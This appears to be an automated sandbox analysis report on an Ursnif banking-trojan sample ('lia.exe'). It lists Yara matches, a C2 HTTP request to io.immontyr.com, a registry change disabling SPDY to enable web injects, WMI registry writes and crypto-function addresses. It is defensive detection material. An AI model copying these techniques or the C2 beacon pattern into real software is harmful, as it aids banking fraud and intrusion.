Source: global traffic	HTTP traffic detected: GET /6AgScewXArsM_2BFmRh/2pb60JsM3cYOiJQfoEqhxS/XBqVgQIYsRpEr/yoCXCgLf/y1qkoNRLcIv9gBJJquez8p4/tRkVMZ4drM/Xr6yguBScPI_2FHzu/H_2FvyhGemOv/8CbTsxfBhQ6/Wgqn5njZwuecNO/0ZUAF5iUC9u0FGPgne2Pd/hUjjD7f7srSH7qRy/yQbW_2BNcbmjwvz/43Z7l034Kd9pUEZYyD/lqXle_2Bn/M1jhi1NkfKtxF86Ts8rH/3AjxB9h8PcXSos9dSO_/2FUaQoaL5TEUFHzDcyiMsr/DzmpP5HI0X7E9/2_2BXGsb/Z46ybggq4jBb9mfE_2FUIJ0/VTd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com

Source: RuntimeBroker.exe, 00000024.00000000.640770268.0000021910A80000.00000004.00000001.sdmp

String found in binary or memory: n Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)

Source: unknown

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
Source: Yara match	File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
Source: Yara match	File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

Source: C:\Users\user\Desktop\lia.exe

1_2_00B17479

System Summary:

Writes or reads registry keys via WMI

Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Detected potential crypto function

Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B16DD3	1_2_00B16DD3
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B17F60	1_2_00B17F60
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B16B67	1_2_00B16B67
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039E63BC	1_2_039E63BC
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039EA241	1_2_039EA241
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D95FE	1_2_039D95FE
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039EF1EE	1_2_039EF1EE
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D9D64	1_2_039D9D64
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039DC086	1_2_039DC086
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D34DC	1_2_039D34DC
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039E78F1	1_2_039E78F1
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D504A	1_2_039D504A
Source: C:\Windows\System32\control.exe	Code function: 18_2_0054AB44	18_2_0054AB44
Source: C:\Windows\System32\control.exe	Code function: 18_2_0054B58C	18_2_0054B58C
Source: C:\Windows\System32\control.exe	Code function: 18_2_005386D0	18_2_005386D0
Source: C:\Windows\System32\control.exe	Code function: 18_2_00549858	18_2_00549858
Source: C:\Windows\System32\control.exe	Code function: 18_2_00532804	18_2_00532804
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053A808	18_2_0053A808
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053B008	18_2_0053B008
Source: C:\Windows\System32\control.exe	Code function: 18_2_00548820	18_2_00548820
Source: C:\Windows\System32\control.exe	Code function: 18_2_00538024	18_2_00538024
Source: C:\Windows\System32\control.exe	Code function: 18_2_00535828	18_2_00535828
Source: C:\Windows\System32\control.exe	Code function: 18_2_005268FC	18_2_005268FC
Source: C:\Windows\System32\control.exe	Code function: 18_2_005340E8	18_2_005340E8
Source: C:\Windows\System32\control.exe	Code function: 18_2_00523890	18_2_00523890
Source: C:\Windows\System32\control.exe	Code function: 18_2_00524080	18_2_00524080
Source: C:\Windows\System32\control.exe	Code function: 18_2_00545954	18_2_00545954
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052B154	18_2_0052B154
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053194B	18_2_0053194B
Source: C:\Windows\System32\control.exe	Code function: 18_2_005231D4	18_2_005231D4
Source: C:\Windows\System32\control.exe	Code function: 18_2_00536190	18_2_00536190
Source: C:\Windows\System32\control.exe	Code function: 18_2_005352CC	18_2_005352CC
Source: C:\Windows\System32\control.exe	Code function: 18_2_005212BC	18_2_005212BC
Source: C:\Windows\System32\control.exe	Code function: 18_2_00542330	18_2_00542330
Source: C:\Windows\System32\control.exe	Code function: 18_2_00537BFC	18_2_00537BFC
Source: C:\Windows\System32\control.exe	Code function: 18_2_00542BA0	18_2_00542BA0
Source: C:\Windows\System32\control.exe	Code function: 18_2_00523BA4	18_2_00523BA4
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053BC10	18_2_0053BC10
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052C49C	18_2_0052C49C
Source: C:\Windows\System32\control.exe	Code function: 18_2_005344B4	18_2_005344B4
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052DCA8	18_2_0052DCA8
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053CCA8	18_2_0053CCA8
Source: C:\Windows\System32\control.exe	Code function: 18_2_00530544	18_2_00530544
Source: C:\Windows\System32\control.exe	Code function: 18_2_00547D6C	18_2_00547D6C
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053751C	18_2_0053751C
Source: C:\Windows\System32\control.exe	Code function: 18_2_00544530	18_2_00544530
Source: C:\Windows\System32\control.exe	Code function: 18_2_00529DF0	18_2_00529DF0
Source: C:\Windows\System32\control.exe	Code function: 18_2_0054C588	18_2_0054C588
Source: C:\Windows\System32\control.exe	Code function: 18_2_00548DA0	18_2_00548DA0
Source: C:\Windows\System32\control.exe	Code function: 18_2_00531618	18_2_00531618
Source: C:\Windows\System32\control.exe	Code function: 18_2_00543E2C	18_2_00543E2C
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052A6D0	18_2_0052A6D0
Source: C:\Windows\System32\control.exe	Code function: 18_2_00547EA0	18_2_00547EA0
Source: C:\Windows\System32\control.exe	Code function: 18_2_00539740	18_2_00539740
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052CF44	18_2_0052CF44
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053FF4C	18_2_0053FF4C
Source: C:\Windows\System32\control.exe	Code function: 18_2_00527F64	18_2_00527F64
Source: C:\Windows\System32\control.exe	Code function: 18_2_005437D0	18_2_005437D0
Source: C:\Windows\System32\control.exe	Code function: 18_2_00548FA8	18_2_00548FA8
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F86D0	34_2_00000215F47F86D0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F480AB44	34_2_00000215F480AB44
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4808820	34_2_00000215F4808820
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E3BA4	34_2_00000215F47E3BA4
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4809858	34_2_00000215F4809858
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4802BA0	34_2_00000215F4802BA0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4808FA8	34_2_00000215F4808FA8
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F5828	34_2_00000215F47F5828
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F8024	34_2_00000215F47F8024
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F48037D0	34_2_00000215F48037D0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47FBC10	34_2_00000215F47FBC10
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47FB008	34_2_00000215F47FB008
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47FA808	34_2_00000215F47FA808
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F2804	34_2_00000215F47F2804
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F7BFC	34_2_00000215F47F7BFC
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F40E8	34_2_00000215F47F40E8
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4804530	34_2_00000215F4804530
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F44B4	34_2_00000215F47F44B4
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47EDCA8	34_2_00000215F47EDCA8
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47EC49C	34_2_00000215F47EC49C
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4805954	34_2_00000215F4805954
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E3890	34_2_00000215F47E3890
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E4080	34_2_00000215F47E4080
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4807D6C	34_2_00000215F4807D6C
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47EB154	34_2_00000215F47EB154
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F194B	34_2_00000215F47F194B
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F0544	34_2_00000215F47F0544
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47FCCA8	34_2_00000215F47FCCA8
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F751C	34_2_00000215F47F751C
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E68FC	34_2_00000215F47E68FC
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E9DF0	34_2_00000215F47E9DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E31D4	34_2_00000215F47E31D4
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4803E2C	34_2_00000215F4803E2C
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F6190	34_2_00000215F47F6190
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F480C588	34_2_00000215F480C588
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F480B58C	34_2_00000215F480B58C
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4808DA0	34_2_00000215F4808DA0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F1618	34_2_00000215F47F1618
